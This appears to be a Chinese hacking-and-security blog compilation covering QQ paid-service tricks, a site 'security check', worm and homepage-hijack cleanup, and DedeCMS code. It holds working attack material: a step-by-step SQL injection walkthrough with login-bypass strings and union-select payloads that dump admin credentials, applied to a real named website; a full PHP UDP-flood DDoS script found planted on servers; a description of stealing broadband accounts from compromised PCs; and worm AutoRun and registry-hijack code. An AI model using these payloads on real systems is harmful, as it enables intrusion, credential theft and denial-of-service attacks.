QQ免费刷砖解析

09年就在 E往情深 安全官网QQ群了, 总是好多提到,我要免费刷砖,免费给我个软件, 先说刷砖的软件吧, 近阶段我见过的,都是钓鱼程序,或者是需要先交钱的,骗了钱以后,软件运行不了,出错。。等等理由。。。 那软件本来就不会那么强大。。。或许会有高手做出来,因为刷砖毕竟还是有方法的。。。
下面说下我知道的,所谓的黑客免费刷砖,有两种方法:
?第一: 通过移动手机免费刷砖
先去:http://www.monternet.com?这个移动梦网网站,注册下帐号。
然后,就要开始开QQ业务了,经常开QQ业务的人都知道,第一次开通QQ是在72小时,就是3天以后才开始收费的,
下面是开通业务的地址:
QQ会员:http://paycenter.qq.com/cgi-bin/ … i?service_type=club
QQ红钻贵族:http://paycenter.qq.com/cgi-bin/ … service_type=qqshow
QQ黄钻贵族:http://paycenter.qq.com/cgi-bin/ … QQ.1653_FriendTip.5
去这里开通了以后,看到QQ图标,显示,你开通的业务了以后。。。 继续最后一步
再去移动梦网网站??http://www.monternet.com?去登录,如果没显示你开通的业务,那就是官网还没更新,等点时间就好了,
登录了以后,可以在网站下面看到开通的QQ业务,然后右边就个暂停的按钮,点下暂停,那么这个业务在移动那里就会暂停,
可是开通业务的功能仍然可以用,不过这种方法太低级,而且不稳定,业务随时可能会掉线。。。
下面说下?人家黑客 是怎么刷砖的,不过这可是犯法的事哦,咱们只需要明白一下原理就可以了。
?第二: 通过宽带肉鸡刷砖
黑客嘛,既然是黑客,就要会抓鸡,不是说抓家里好吃的鸡哈,是网上的肉鸡,可以控制别人电脑的权限,就是你的肉鸡了,
找一个肉鸡,然后通过密码查看器,看下他的宽带帐号和密码。。。
上面讲的是远程端的操作,远程端就需要他的宽带帐号和密码,然后还要知道他的IP,差下他IP是那里的。
下面就要说本地客户端要进行的操作了 。。。
免费刷砖,难道真的可以通过腾讯的漏洞实现免费么, 中国的腾讯QQ,美国的MSN,这么有名的企业,要是那么多人都知道漏洞,那么容易找到漏洞,那就提不到有名的企业了。。。 因为上面说了,需要肉鸡,所以不是通过腾讯的漏洞刷砖, 其实还是要花钱的,只不过不是花的自己的钱,花的是 别人的钱, 之所以上面说的犯法,就是偷别人的帐号密码消费,建议不要这么做。。。
言归正传,本地实现刷砖,因为腾讯支持宽带刷砖,这个要看地区了,腾讯也不是支持所有地方都可以宽带刷砖的,首先你的肉鸡,必须要是腾讯支持宽带刷砖的地区,然后需要本地登录一下宽带帐号和密码,然后代理一下本地的IP,代理成肉鸡地区的IP,这样自己电脑就可以当肉鸡电脑来用了,就可以刷砖了。。。
这就是黑客所谓的免费刷砖了,不过随着时间的改变,或许会有新方法。。。…
 

为学员检测网站

昨天晚上,QQ上学校的一学员,告诉我她老公的网站,其他的就不多说了吧,我看到网站后,检测了一下安全方面,连最简单的漏洞都没修补,网站是这个:http://www.cxqq.com下面开始检测一下了。
第一:首先先要找到后台,当然也可以直接找上传漏洞,这个我找了一下,没找到,然后就选择先找后台吧,一般的后台都会是admin,admin/login.asp,login.asp,admin.asp,manage等等就不一一列举了,这个可以用黑客工具,明小子或者啊D注入检测出后台,这个网站,检测到了后台地址是http://www.cxqq.com/manage? 找到后台了后,测试弱口令,弱口令就是万能钥匙,? 帐号:’or’’=’’or’ 密码:’or’’=’’or’?? 帐号和密码都是’or’’=’’or’,看了下他这个网站有验证码,在这里顺便一起说下网站后台的安全方面的知识吧,网站后台如果直接就是用户名和密码,然后没别的了,黑客可以暴力破解出你的帐号和密码,所以说帐号和密码设置的复杂一点比较好,不过设置的复杂一点,这样还是会被暴力破解的,只是时间问题了,在这里说一下我知道的网站后台安全三方面
1.?首先要保证你的后台的安全,别设置一些admin等常用目录,那样黑客直接用工具就可以扫到后台了,然后密码设置的复杂一点;
2.?然后就是在后台认证中加上验证码,这样就可以防止黑客的暴力破解,可以暴力破解,但是每次都要输入验证码,现在貌似一般黑客还写不出自动获取验证码并填写的程序,所以这样做是为了暴力破解;
3.?其实上面两个已经够安全了,如果还不放心可以再加一道防线,或者直接用这个,不用第二个也可以,这种方法叫做IP验证,就是如果一个外网IP登陆超过几次,就不可以登陆了,这样也是限制了暴力破解,除非你的罪黑客了,非要拿下你的站,那网站做的安全了,还可以入侵服务器呢,不过起码的保护我们要做好。。。
检测出了网站后台,然后用弱口令去尝试,我试过了。弱口令不管用,那只有找其他办法了…
? 第二:找注入点,这个也可以用啊D或者明小子检测的,或者手工去检测吧,and 1=1和and 1=2 如果一个返回正常网页,一个返回不正常网页,说明存在注入点,注入点就是可以通过这个 asp?id=? 这类的网页,直接操作数据库,上面那个网站,找到了好几个注入点,先说其中一个吧:
http://www.cxqq.com/cn/cpshow.asp?id=672&sort=82
通过他直接操作数据库,下面的任务就是猜解表名了,然后猜解字段名,然后登陆后台找备份数据库或者上传漏洞,拿服务器,这就是入侵asp网站其中的一种方法了,还有其他的暴力破解FTP,等等就不一一列举了,www.cxqq.com 这个网站,只用工具猜解到了表名,下面的字段名字就没猜解到了,如果有专业的黑客字典,肯定会猜解到了,然后按照上面的步骤,入侵这个网站很简单,这是我学校一个学员给我他对象的一个网站,我帮友情检测的,希望站长修补一下漏洞以防黑客非法入侵。。。

在这里再说一下手工入侵网站的步骤吧,当然用工具要明白了原理,然后才会手工检测,只会用工具,那不叫黑客,黑客这是个什么概念呢,想知道就自己百度去,嘿嘿。。。下面说下整理的入侵asp网站的步骤吧 。。。

第一: 查找注入点,? and 1=1? 和?? and 1=2
第二: 读表,?????? and (select count (*) from admin)
第三: 读字段,???? and (select count (username) from admin)
第四:? 查询记录,?? order by 37
第五:? 爆破用户名,
union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37
from admin
第六: 爆破密码,
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37
from admin
这就是六部了,我不是专业的黑客,只是了解而已,希望菜鸟们学会了技术不要破坏政府等公益性网站,当然老鸟肯定不会无聊的去入侵别人的网站了,因为中国的黑客也是很强大的,www.0535code.com学习编程从此变的轻松起来,我们的风格不是死学习,不是要程序玩转自己,而是自己学会学习,学会怎么让程序变得好玩,程序只要好玩了,那什么将都不再难了。。。嗯嗯,今天对于入侵网站就写到这里了。。。

手工查杀一个蠕虫病毒

昨天上网聊天,正在聊得好的时候,去软件盘里面找软件,怎么都变成快捷方式了,都不显示了,我没开杀软,这一定是病毒在搞的鬼了,把快捷方式删除掉,软件盘里面什么都没有了,删除的都是快捷方式,没事,文件肯定还藏在磁盘里面,用了下DOS命令,ATTRIB,没效果,还是不显示,于是我进PE看了下,看到里面的文件了,看到了每个磁盘里面都有两个文件,一个是AutoRun.inf,另一个是1066705994.vbs,第一个AutoRun.inf这个配置文件,是干嘛的呢,之前写了一篇文章里面写的修改U盘图标,就是用的这个文件夹,就是自动加载的意思,只要单击一下,就会触发他,先说下我之前因为看不到文件的原因吧,之前看不到文件的原因,那是因为这两个文件是受保护的系统文件属性,所以,在文件夹选项选择,显示所有文件夹(包括隐藏文件夹),然后显示系统文件夹也不显示,还有一个,就是隐藏操作系统受保护的文件,这里把对号去掉就可以看到我们的文件夹而不是快捷方式了。。。
看下AutoRun.inf里面的内容:
[AutoRun]
Shellexecute=WScript.exe 1066705994.vbs “AutoRun”
shell\open=HH(&O)
shell\open\command=WScript.exe 1066705994.vbs “AutoRun”
shell\open\Default=1
shell\explore=HHHHH(&X)
shell\explore\command=WScript.exe 1066705994.vbs “AutoRun”
这配置文件里面的意思就是自动加载 1066705994.vbs 这个脚本。。。 下面看下脚本的内容:
‘b”3X&&#&3ex’)!x3ax,(jr
‘_%);a/+Gr/$n$!((Un!0;a/+X^.!|0!j}&!~0C=/~m%ko%*bI”%g`/5/o!h+]&`~o=DUn!0;r/$n$!((X^.!|0!j}&!~0C=3n~m%,oInc!(g=DU^|((;h|%*CDkp
‘5WDa/CKPijon
‘Ihy?llilyL_mog_yH_rn4>cgy;lam&yPclomFi[^&yPclom;mm4M_ny;lam7QM]lcjn(;laog_hnm4PclomFi[^7A_nG[chPclom”+#4Pclom;mm7A_nG[chPclom”*#4;laHog7*4>iyQbcf_y;laHogy6y;lam(=iohn4J[l[g7J[l[g {y{ ;lam”;laHog#4;laHog7;laHogy%y+4Fiijqr
‘}@-z,=,8gvm,>0R|423?Rz,=,8VJ]SSmk
‘Zlslj{‘Jhzl’Z|iWhyhtip
‘@^pb|~ork~rk
‘u92s%8,`o)*8Kzv’6-48Qv’6-48i900q%1)OCUL]f%00Cu92Ku92s%8,L]f%00Cl2:%()v=78)1Ky-697o3%(Oy-697d77L]f%00Cu92KEHv=78)1u338H 7=78)1 7:’,378Q)<)CEIy-697o3%(Lln
‘|;M?Y[NRN[eY[FIA[e[CHC[Ye[CH@[np
‘*MF(9L@tY\+QKL=E*GGL\4KQKL=Eji4&’,|(x{e|0|WY](9J9Eqz9DDW*MF_*MF(9L@`qz9DDW!FN9<=+QKL=E_.AJMK$G9<c.AJMKxKK`qz9DDW*MF_Y\+QKL=E*GGL\4KQKL=E4KN;@GKLe=P=WY].AJMK$G9<`nn
‘.L^PjlML_lvjlNXOlpm
…………………..
都是一堆乱码,可惜了,需要解密,解密需要用两次execute函数来解密,解密就不说了吧。。。喜欢研究的人可以去研究下,这个话题主要讨论手工查杀这个蠕虫病毒。。。
这个病毒其实很垃圾的,没什么破坏性,只是会把所有盘的文件夹变成快捷方式而已,只要把隐藏操作系统受保护的文件那里的 对号去掉,就是不让他隐藏,显示出来,把这两个文件删除就可以了,注意,要全盘都删除,只要有一个盘没删除,就会感染所有盘,我的好像是U盘感染了,手工查杀蠕虫病毒就是这样了,这个是比较低级的病毒,我把病毒提取出来了,下载了360杀毒软件,查杀下,杀软不报毒,虽然这个对电脑没什么大的危害,但是也具有恶意性了,所有有些东西,也不能全靠杀毒软件,不是有句话说:伤人之心不能有,防人之心不能没有,换到个人电脑上就应该讲:不防病毒之心不能有(防病毒之心不能没有),不用杀软之心不可有,嘿嘿,好像绕口令,这个病毒就是让我这么给清理掉的。。。

 

每次重启后IE主页总是被修改剖析

这几天电脑一直中病毒,因为没用杀软的缘故吧,经过这几次,总结了下用杀软的好处,可以查杀病毒,不必担心电脑中病毒,中木马,不过不能完全依靠于杀毒软件的,只有杀毒软件会更新么,要知道病毒,木马也会更新的,我就碰到过杀软根本不杀的病毒,好了不废话了,先说下今天刚装了新系统,主页单击IE右键修改主页,竟然修改不了,用360修改了以后,下次重启,又被恶意修改了。
由这个就可以想到,应该检查一下开机启动项,运行msconfig,查看一下启动项里面有个run1.vbs 这个是个VBS脚本,然后到系统驱动器里面搜索这个文件,找到这个文件,右击编辑就会以记事本的方式打开了, 看了下里面的代码是:
DIM objShell
set objShell=wscript.createObject(“wscript.shell”)
iReturn=objShell.Run(“cmd.exe /C c:\windows\home.cmd”, 0, TRUE)
上面是定义的一个变量 objshell, 看这个单词的意思就知道是个调用的对象了,下面就是新建一个wscript.shell对象了, 后面的是类,前面的是对象,这就是面向对象编程了,最后一句是在调用一个批处理文件。。。下面继续查找调用的这个批处理。。。
去windows里面搜索home.cmd, 找到了,里面的内容是:
@reg add “HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command” /v “” /d “\”C:\Program Files\Internet Explorer\IEXPLORE.EXE\” http://www.yule918.cn” /f
@exit
@reg add? 这个是添加到注册表,看下后面有个网址,每次开机都会设置成这个网址,下面介绍下这个批处理的语法格式:
 
REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separato
KeyName? [\\Machine\]FullKey
远程机器的机器名 – 忽略默认到当前机器。
远程机器上只有 HKLM 和 HKU。
FullKey? ROOTKEY\SubKey
ROOTKEY? [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey?? 所选 ROOTKEY 下注册表项的完整名
/v?????? 所选项之下要添加的值名
/ve????? 为注册表项添加空白值名<无名称>
/t?????? RegKey 数据类型
[ REG_SZ??? | REG_MULTI_SZ? | REG_DWORD_BIG_ENDI
REG_DWORD | REG_BINARY??? | REG_DWORD_LITTLE_E
REG_NONE? | REG_EXPAND_SZ ]
如果忽略,则采用 REG_SZ
/s?????? 指定一个在 REG_MULTI_SZ 数据字符串中
用作分隔符的字符
如果忽略,则将 “\0” 用作分隔符
/d?????? 要分配给添加的注册表 ValueName 的数据
/f?????? 不用提示就强行改写现有注册表项
他是不用提示,直接写进注册表的,因为每次开机都会加载run1.vbs这个启动项老调用home.cmd,所以 修改主页了以后,下次重启又会变回来了。。。
 

加QQ好友绕过问题

记得有一次? 佳君,我的一好朋友,问我说加QQ好友,有问题,需要答案才可以加,问我可以加为好友不,当时我也没发现这个问题,前段时间发现了这个问题的解决方案, 下载的腾讯QQ软件加好友需要答案,我们可以不用QQ软件加好友。。。
上web.qq.com 这是网页QQ的登录地址,可以到这里登录,添加好友就没那个问题了,可是还需要验证码的,这就要看对方了。。。
嘿嘿, 添加有问题的QQ好友就这么简单。。。
 

在线听歌通过临时文件夹提取音乐

今天在线听歌,突然掉线了,可是歌曲还是在唱,怎么断网了还唱,感觉就是听的同时,文件缓存到本地了,只是不知道在那个文件夹里面,以前就碰到了,找到那个临时文件夹了,IE的缓存文件全部在那个临时文件夹里面,今天听DJ,我网速又慢,顺便找了个方法,对于一些限制下载的也好用,只要可以在线听,80%的是可以通过缓存文件提取出来的。。。。 来分享一下哈~~~
①先试听你想要的歌,让它缓冲完毕;
②打开windows资源管理器→工具→文件夹选项→查看→高级设置→隐藏文件和文件夹,选择“显示所有文件和文件夹”;
③从IE缓存里找到所听的歌的临时文件,copy一下就可以了。IE缓存路径:系统盘:\Documents and Settings\你的用户名\Local Settings\Temporary Internet Files。
大家闲 麻烦的话,就去 本站 软件下载 里面,找 网痴听DJ必备浏览器,也不用设置这么多,只需要一键就可以打开这个缓存文件夹拉。。。

Dedecms 360网站安全卫士100%漏洞修复

Dedecms 360网站安全卫士100%漏洞修复,按照官方的程序是100%的安全的,昨天去版权后360网站卫士提示有sql漏洞,是因为只注释掉加密字符串,后面的特殊操作一起注释掉就会100%安全了,不在提示sql注册漏洞了。

/*
$arrs1 = array(0x63,0x66,0x67,0x5f,0x70,0x6f,0x77,0x65,0x72,0x62,0x79);
$arrs2 = array(0x20,0x3c,0x61,0x20,0x68,0x72,0x65,0x66,0x3d,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,
0x77,0x77,0x77,0x2e,0x64,0x65,0x64,0x65,0x63,0x6d,0x73,0x2e,0x63,0x6f,0x6d,0x20,0x74,0x61,0x72,
0x67,0x65,0x74,0x3d,0x27,0x5f,0x62,0x6c,0x61,0x6e,0x6b,0x27,0x3e,0x50,0x6f,0x77,0x65,0x72,0x20,
0x62,0x79,0x20,0x44,0x65,0x64,0x65,0x43,0x6d,0x73,0x3c,0x2f,0x61,0x3e);

//特殊操作
if(isset($GLOBALS[‘arrs1’]))
{
$v1 = $v2 = ”;
for($i=0;isset($arrs1[$i]);$i++)
{
$v1 .= chr($arrs1[$i]);
}
for($i=0;isset($arrs2[$i]);$i++)
{
$v2 .= chr($arrs2[$i]);
}
$GLOBALS[$v1] .= $v2;
}

*/

为什么会这样呢?后面的特殊操作看起来像是解密程序。本地运行了下结果,就是版权了。如下图:

Dedecms版权

PHP脚本实现DDOS程序

把脚本放在服务器上,攻击服务器,这种事我可做不出来,最近好几个客户都反映有这种问题,检查了代码都是这种问题,是Dede的漏洞了,或者设置下目录权限,把纳呆代码提取出来了,分享下,只要把这个文件的名字修改下就好了,或者直接删掉。

<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER

["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname

()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Warning to: opening";
exit;
}

for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}

$max_time = time()+$exec_time;
//提示: www.haoddos.com 是骗子 请谨慎。
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}

echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2)

. ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . "

mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" .

round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

编译文件被感染,生成软件报毒,delphi朋友

大家检查下安装目录
lib下的SysConst.dcu文件,大小,如果为17KB,被感染了。我的是18K,目前5个杀毒,瑞星,卡巴,AVG等检测到了病毒
SysConst.dcu正式大小应该为12KB不到点点。lib/debug目录下有SysConst.dcu,SysConst.bak(改名回来)文件,替换回来就可以恢复正常!
我也不知道我是怎么感染的。
卡饭朋友的疑问
http://www.kpfans.com/bbs/thread-539760-1-1.html
http://www.unpack.cn/viewthread.php?tid=39339
基本都是8.16号后的问题。并非误报!
替换回正规SysConst.dcu问题解决了!大家查看下巴。免得自己写的东西被人说病毒
可能是某个控件带来的问题!
此文转载于:http://club.itqun.net/showtopic.aspx?forumid=48&forumpage=1&topicid=104490&go=next
卡饭论坛,杀毒太强大了,不是杀毒软件一个程序,月月也是一个病毒专家,太佩服了,病毒专家,真好,加油…